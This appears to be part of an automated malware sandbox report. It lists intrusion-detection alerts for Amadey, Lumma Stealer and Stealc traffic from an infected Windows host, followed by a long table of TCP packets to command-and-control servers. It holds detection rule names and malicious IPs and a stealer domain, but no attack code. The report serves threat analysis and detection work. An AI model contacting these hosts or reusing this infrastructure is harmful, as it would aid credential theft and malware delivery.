2024-12-10T11:11:52.915393+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49988	185.215.113.43	80	TCP
2024-12-10T11:11:53.664367+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49994	104.21.32.1	443	TCP
2024-12-10T11:11:53.664367+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49994	104.21.32.1	443	TCP
2024-12-10T11:11:53.668045+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	49994	104.21.32.1	443	TCP
2024-12-10T11:11:54.365845+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49996	31.41.244.11	80	TCP
2024-12-10T11:11:54.447534+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49951	104.16.185.241	80	TCP
2024-12-10T11:11:56.628576+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	50007	104.21.32.1	443	TCP
2024-12-10T11:11:56.628576+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50007	104.21.32.1	443	TCP
2024-12-10T11:11:58.637296+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	50014	104.21.32.1	443	TCP
2024-12-10T11:11:58.637296+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50014	104.21.32.1	443	TCP
2024-12-10T11:12:01.726459+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50020	185.215.113.43	80	TCP
2024-12-10T11:12:03.178884+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	50028	104.21.32.1	443	TCP
2024-12-10T11:12:03.178884+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50028	104.21.32.1	443	TCP
2024-12-10T11:12:20.006230+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	50093	104.21.32.1	443	TCP
2024-12-10T11:12:20.006230+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50093	104.21.32.1	443	TCP
2024-12-10T11:12:21.191573+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	50093	104.21.32.1	443	TCP
2024-12-10T11:12:21.191573+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50093	104.21.32.1	443	TCP
2024-12-10T11:12:27.388054+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	50095	104.21.32.1	443	TCP
2024-12-10T11:12:27.388054+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50095	104.21.32.1	443	TCP
2024-12-10T11:12:28.691306+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	50095	104.21.32.1	443	TCP
2024-12-10T11:12:28.691306+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50095	104.21.32.1	443	TCP
2024-12-10T11:12:32.255945+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50096	185.215.113.206	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 11:11:03.483596087 CET	49816	80	192.168.2.5	185.215.113.43
Dec 10, 2024 11:11:03.602998972 CET	80	49816	185.215.113.43	192.168.2.5
Dec 10, 2024 11:11:03.603089094 CET	49816	80	192.168.2.5	185.215.113.43
Dec 10, 2024 11:11:03.665200949 CET	49816	80	192.168.2.5	185.215.113.43
Dec 10, 2024 11:11:03.808310986 CET	80	49816	185.215.113.43	192.168.2.5
Dec 10, 2024 11:11:04.935367107 CET	80	49816	185.215.113.43	192.168.2.5
Dec 10, 2024 11:11:04.935437918 CET	49816	80	192.168.2.5	185.215.113.43
Dec 10, 2024 11:11:06.448756933 CET	49816	80	192.168.2.5	185.215.113.43
Dec 10, 2024 11:11:06.449311972 CET	49827	80	192.168.2.5	185.215.113.43
Dec 10, 2024 11:11:06.568696022 CET	80	49827	185.215.113.43	192.168.2.5
Dec 10, 2024 11:11:06.568762064 CET	80	49816	185.215.113.43	192.168.2.5
Dec 10, 2024 11:11:06.568769932 CET	49827	80	192.168.2.5	185.215.113.43
Dec 10, 2024 11:11:06.568808079 CET	49816	80	192.168.2.5	185.215.113.43
Dec 10, 2024 11:11:06.576406002 CET	49827	80	192.168.2.5	185.215.113.43
Dec 10, 2024 11:11:06.695694923 CET	80	49827	185.215.113.43	192.168.2.5
Dec 10, 2024 11:11:07.919691086 CET	80	49827	185.215.113.43	192.168.2.5
Dec 10, 2024 11:11:07.919768095 CET	49827	80	192.168.2.5	185.215.113.43
Dec 10, 2024 11:11:07.926189899 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:08.045620918 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:08.045686007 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:08.045870066 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:08.165332079 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.373126030 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.373162031 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.373182058 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.373270035 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.373281002 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.373287916 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.373368979 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.373368979 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.373368979 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.373390913 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.373404026 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.373414040 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.373431921 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.373461008 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.373518944 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.373565912 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.492839098 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.492913961 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.492938995 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.493109941 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.496939898 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.497004032 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.497092009 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.497140884 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.565421104 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.565485001 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.565572023 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.565572023 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.569654942 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.569717884 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.569747925 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.569793940 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.575994968 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.576052904 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.576123953 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.576188087 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.584506035 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.584556103 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.584594965 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.584640980 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.592714071 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.592756033 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.592767000 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.592794895 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.601124048 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.601195097 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.601272106 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.601320982 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.609508038 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.609606981 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.609669924 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.609719992 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.617760897 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.617818117 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.617856979 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.617909908 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.626184940 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.626252890 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.626302004 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.626353025 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.634641886 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.634700060 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.634726048 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.634794950 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.641747952 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.641803026 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.641866922 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.641918898 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.648967028 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.649036884 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.649060965 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.649110079 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.685035944 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.685096979 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.757356882 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.757452965 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.757544994 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.757591963 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.759565115 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.759615898 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.759660959 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.759707928 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.764214039 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.764262915 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.764328003 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.764374018 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.768490076 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.768541098 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.768558025 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.768603086 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.773017883 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.773076057 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.773124933 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.773168087 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.777379036 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.777440071 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.777487993 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.777533054 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.781815052 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.781867981 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.781922102 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.781965017 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.786397934 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.786446095 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.786525965 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.786569118 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.790749073 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.790802002 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.790880919 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.790925980 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.795193911 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.795242071 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.795317888 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.795360088 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.799683094 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.799771070 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.799843073 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.799900055 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.804148912 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.804236889 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.804244995 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.804317951 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.808514118 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.808620930 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.808670998 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.808727026 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.813047886 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.813122034 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.813319921 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.813371897 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.817429066 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.817482948 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.817497015 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.817540884 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.820961952 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.821027994 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.821082115 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.821126938 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.824390888 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.824445009 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.824526072 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.824572086 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.827876091 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.827934980 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.828052044 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.828098059 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.831444025 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.831506014 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.831518888 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.831564903 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.834884882 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.834949970 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.835002899 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.835047960 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.838512897 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.838534117 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.838577986 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.838602066 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.949731112 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.949783087 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.949825048 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.949868917 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.951011896 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.951064110 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.951148033 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.951191902 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.953864098 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.953906059 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.954027891 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.954068899 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.956706047 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.956751108 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.956760883 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.956799030 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.959366083 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.959413052 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.959456921 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.959500074 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.962054968 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.962100029 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.962186098 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.962228060 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.964724064 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.964770079 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.964901924 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.964945078 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.967519045 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.967581987 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.967725992 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.967782974 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.969791889 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.969831944 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.969907999 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.969952106 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.972413063 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.972433090 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.972455025 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.972484112 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.974961042 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.975008011 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.975109100 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.975147009 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.977543116 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.977586985 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.977621078 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.977662086 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.980396986 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.980567932 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.980591059 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.980603933 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.982712984 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.982755899 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.982831955 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.982871056 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.985155106 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.985200882 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.985250950 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.985291958 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.987778902 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.987822056 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.987843990 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.987880945 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.990259886 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.990304947 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.990365982 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.990406990 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.992811918 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.992855072 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.992886066 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.992923975 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.995367050 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.995430946 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.995464087 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.995505095 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.998025894 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.998064041 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:09.998097897 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:09.998142958 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.000751019 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.000790119 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.000902891 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.000943899 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.003479958 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.003523111 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.003649950 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.003693104 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.005960941 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.006027937 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.006045103 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.006093025 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.008194923 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.008239031 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.008850098 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.008896112 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.011004925 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.011049986 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.011051893 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.011095047 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.013333082 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.013377905 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.013453007 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.013495922 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.015852928 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.015897036 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.015924931 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.015969038 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.018435001 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.018481016 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.018615961 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.018657923 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.021003008 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.021045923 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.021081924 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.021121025 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.023524046 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.023567915 CET	49828	80	192.168.2.5	31.41.244.11
